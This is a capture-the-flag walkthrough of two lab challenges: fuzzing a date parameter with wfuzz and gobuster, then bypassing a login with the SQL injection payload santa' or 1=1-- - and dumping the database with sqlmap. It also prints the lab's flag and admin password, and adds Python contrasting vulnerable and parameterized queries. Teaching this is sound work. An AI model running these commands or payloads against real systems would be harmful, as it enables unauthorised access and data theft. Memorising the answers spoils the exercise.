Today I am going to do the Day 4 and Day 5 challenges together.

Day 4

This challenge is all about a tool called wfuzz.
wfuzz is used for brute-force attacks on web applications. A payload in wfuzz is simply a data source: that one concept lets any input be inserted into any part of an HTTP request, so attacks can be carried out against the different components of a web application, such as parameters, authentication, forms, directories/files, headers, etc.

Given the URL "http://shibes.xyz/api.php", what would the entire wfuzz command look like to query the "breed" parameter using the wordlist "big.txt" (assume that "big.txt" is in your current directory)?

Note: For legal reasons, do not actually run this command as the site in question has not consented to being fuzzed!

This is how a wfuzz command is built (the screenshot shows the "Fuzz parameters" usage: the word FUZZ marks the spot in the request that gets replaced by each entry of the payload).

The answer is wfuzz -c -z file,big.txt http://shibes.xyz/api.php?breed=FUZZ. Here -c colours the output, -z file,big.txt loads the wordlist as the payload, and FUZZ is the placeholder that each word replaces. When you run a command like this for real, quote the URL (for example '...?breed=FUZZ'), because ? and & are special characters in the shell.

Use GoBuster (against the target you deployed — not the shibes.xyz domain) to find the API directory. What file is there?

The question says we need to find a directory called api. To find it I used a tool called Gobuster, which discovers directories and files in a web application by brute-forcing paths from a wordlist.

The command for it is gobuster dir -u <URL> -w <wordlist_path> -x <file_type>, where dir selects directory mode, -u is the target URL, -w the wordlist and -x the file extension(s) to append to each word (here php).

In the output you can see there is one PHP file in the api directory, so the answer is site-log.php.

Fuzz the date parameter on the file you found in the API directory. What is the flag displayed in the correct post?

Now they are telling us to brute-force that file to find the right post. The hint mentions a date variable, so that is the parameter we are going to fuzz.

The command for that is wfuzz -c -z file,<wordlist_path> -u '<URL>?date=FUZZ', where <URL> is the site-log.php file found above (note that there is no space after file, and the parameter goes after a ?). FUZZ takes the value of the date parameter from each line of the wordlist. In the output, the Chars column shows 13 for 20201125, meaning the response for that date is 13 characters long, unlike the others, so that is the post we want. With a long wordlist it is easier to hide the uninteresting rows with --hh <baseline chars> so that only the response that differs is listed.

this is the flag.
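As an added example (my code, not anything from the original write-up or from the room), here is the logic behind that step in Python: build the YYYYMMDD wordlist that the hint points at, and then pick out the response whose size differs from the rest, which is what reading the Chars column (or hiding the baseline size with wfuzz's --hh filter) does by eye. The sample responses are constructed, and the target host and wordlist file name are placeholders.

```python
"""Added example, not part of the original write-up: a date wordlist for wfuzz and
the "which response is different?" check that the Chars column answers."""
from __future__ import annotations

from collections import Counter
from datetime import datetime, timedelta


def date_wordlist(start: str, end: str) -> list[str]:
    """Every calendar date from start to end (inclusive), both given as YYYYMMDD.

    Only real dates are emitted; wfuzz's own `-z range,20201101-20201231` payload
    would also send impossible values such as 20201131.
    """
    fmt = "%Y%m%d"
    current = datetime.strptime(start, fmt)
    last = datetime.strptime(end, fmt)
    words = []
    while current <= last:
        words.append(current.strftime(fmt))
        current += timedelta(days=1)
    return words


def write_wordlist(path: str, words: list[str]) -> None:
    """One payload per line, the format that `-z file,<path>` expects."""
    with open(path, "w", encoding="ascii") as fh:
        fh.write("\n".join(words) + "\n")


def find_outliers(responses: dict[str, str]) -> list[str]:
    """Given payload -> response body, return the payloads whose body length is
    not the most common one.

    Unknown dates all come back the same (baseline) size; the post we want is the
    one whose size stands out. This is the same judgement as reading wfuzz's Chars
    column, or running it with `--hh <baseline>` to hide the boring rows.
    """
    sizes = {payload: len(body) for payload, body in responses.items()}
    baseline = Counter(sizes.values()).most_common(1)[0][0]
    return [payload for payload, size in sizes.items() if size != baseline]


# Constructed sample responses (not real output): three empty pages and one
# 13-character body, mirroring the "13 Chars" row in the write-up.
SAMPLE_RESPONSES = {
    "20201123": "",
    "20201124": "",
    "20201125": "example entry",
    "20201126": "",
}


if __name__ == "__main__":
    write_wordlist("dates.txt", date_wordlist("20201101", "20201225"))
    print("outliers in sample:", find_outliers(SAMPLE_RESPONSES))
    # Then, against the deployed target (placeholder host):
    #   wfuzz -c -z file,dates.txt --hh 0 -u 'http://<target>/api/site-log.php?date=FUZZ'
```

The wordlist only needs to cover the plausible range (the room ran in late 2020), and generating it yourself is safer than a numeric range because every line is a real date the application can parse.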

Day 5

This challenge is all about SQL injection. Here we are going to learn how to use sqlmap, an automated tool for detecting and exploiting SQL injection.

Without using directory brute forcing, what’s Santa’s secret login panel?

When you open the hint you see a masked path like /s**tap***l. The challenge is about Santa and the question talks about a panel, so putting those two together gives the answer:
the answer is /santapanel

This is what the panel looks like. To get in we need to perform a SQL injection against the login form.

The SQL injection payload is santa' or 1=1-- - typed into the username field. The single quote closes the string the application builds around the username, or 1=1 makes the WHERE clause always true, and -- comments out the rest of the query, including the password check (the trailing - only ensures that a space follows --, which MySQL requires for it to count as a comment).
Press Login and you will be logged in to the Santa panel.

This is what it looks like once inside. Now I am going to enumerate this database using sqlmap to find all the other answers.

Now I am going to switch on my Burp proxy, capture the request, and feed that captured request to sqlmap.
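As an added example (my code, not the room's or the author's), here is the kind of login query that the payload above defeats, next to the parameterized version that does not, exercised against an in-memory SQLite table. The schema, the password and the table name are constructed assumptions; the real panel's database is only seen through sqlmap's dump.

```python
"""Added example, not from the original post: the login query Santa's panel
evidently runs, beside a parameterized version, tested against SQLite in memory."""
import sqlite3

# The payload typed into the username field in the write-up.
PAYLOAD = "santa' or 1=1-- -"


def build_db() -> sqlite3.Connection:
    """Constructed users table; the real panel's schema and password are unknown."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('santa', 'not-the-real-password')")
    return conn


def vulnerable_query(username: str, password: str) -> str:
    """String-built query: whatever the user types becomes part of the SQL."""
    return (
        "SELECT COUNT(*) FROM users "
        f"WHERE username = '{username}' AND password = '{password}'"
    )


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Runs the string-built query; a crafted username rewrites the WHERE clause."""
    return conn.execute(vulnerable_query(username, password)).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    """Bound parameters: the driver sends the values separately from the SQL text,
    so a quote in the username is just a quote inside a string value."""
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


if __name__ == "__main__":
    db = build_db()
    print(vulnerable_query(PAYLOAD, "anything"))
    # -> SELECT COUNT(*) FROM users WHERE username = 'santa' or 1=1-- -' AND password = 'anything'
    # The quote closes the string, `or 1=1` is always true, and `-- ` turns the
    # password check into a comment. The trailing `-` only guarantees that a space
    # follows `--`, which MySQL requires before it treats `--` as a comment.
    print("vulnerable login with payload:", login_vulnerable(db, PAYLOAD, "anything"))
    print("safe login with payload:      ", login_safe(db, PAYLOAD, "anything"))
```

Once inside, the enumeration the write-up does with sqlmap is driven from the saved Burp request; with the request in a file, sqlmap -r <request file> --batch --dump is the usual form and produces the table dump the rest of the answers are read from.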

How many entries are there in the gift database?

In the dump you can see there are 22 gifts in the database.

What did Paul ask for?

GitHub Ownership

If you scroll further down you can see there are 2 tables.

What is the flag?

In the dump above you can see an entry called flag.
The flag is thmfox{All_I_Want_for_Christmas_Is_You}

What is admin’s password?

EhCNSWzzFP6sc7gB

See you in another blog!

Written by mohomed arfath

Security Engineer by profession, the rest is classified.